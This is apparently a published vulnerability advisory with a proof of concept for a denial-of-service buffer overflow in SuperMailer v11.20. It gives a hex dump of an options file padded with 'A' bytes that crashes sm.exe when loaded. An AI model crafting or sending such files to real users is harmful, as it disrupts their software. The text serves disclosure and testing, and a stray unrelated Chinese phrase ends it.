# Exploit Title:SuperMailer v11.20 - Buffer overflow DoS # Exploit Author: Rafael Pedrero # Discovery Date: 2021-02-07 # Vendor Homepage: https://int.supermailer.de/download_newsletter_software.htm # Software Link : https://int.supermailer.de/smintsw.zip / https://int.supermailer.de/smintsw_x64.zip # Tested Version: v11.20 32bit/64bit [11.20.0.2204] # Tested on:Windows 7, 10 CVSS v3: 3.3 CVSS vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L CWE: CWE-20 Vulnerability description: A vulnerability in Newsletter Software SuperMailer v11.20 32bit/64bit [11.20.0.2204] could allow an attacker to cause a process crash resulting in a Denial of service (DoS) condition for the application on an affected system. The vulnerability exists due to insufficient validation of certain elements with a configuration file malformed. An attacker could exploit this vulnerability by sending a user a malicious SMB (configuration file) file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to cause the application to crash when trying to load the malicious file. Proof of concept: 1.- Go to File -> Save program options... 2.- Save the file (default extension *.smb) 3.- Edit file and you introduce a lot of A in somewhere. Example: DoS.smb file Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 0000000010 03 00 00 00 00 00 00 A9 E5 7E 41 41 41 41 41........©å~AAAAA 0000001041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000002041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000003041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000004041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000005041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000006041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000007041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000008041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 0000009041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 000000A041 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 000000B041 41 97 99 E5 40 00 00 00 00 00 00 00 00 00 00AA—™å@.......... 000000C000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00................ 000000D000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00................ 000000E000 00 00 00 00 00 6B 00 00 00 53 00 6F 00 66 00......k...S.o.f. 000000F074 00 77 00 61 00 72 00 65 00 5C 00 4D 00 69 00t.w.a.r.e.\.M.i. 0000010072 00 6B 00 6F 00 20 00 42 00 6F 00 65 00 65 00r.k.o. .B.o.e.e. 0000011072 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00r. .S.o.f.t.w.a. 0000012072 00 65 00 5C 00 53 00 75 00 70 00 65 00 72 00r.e.\.S.u.p.e.r. 000001304D 00 61 00 69 00 6C 00 65 00 72 00 5C 00 54 00M.a.i.l.e.r.\.T. 0000014065 00 73 00 74 00 20 00 45 00 4D 00 61 00 69 00e.s.t. .E.M.a.i. 000001506C 00 20 00 41 00 64 00 64 00 72 00 65 00 73 00l. .A.d.d.r.e.s. 0000016073 00 65 00 73 00 00 00 00 00 00 00 00 00 00 00s.e.s........... And save the file. 4.- Go to File -> Restore program options... 5.- The application "sm.exe" crash.
体验盒子
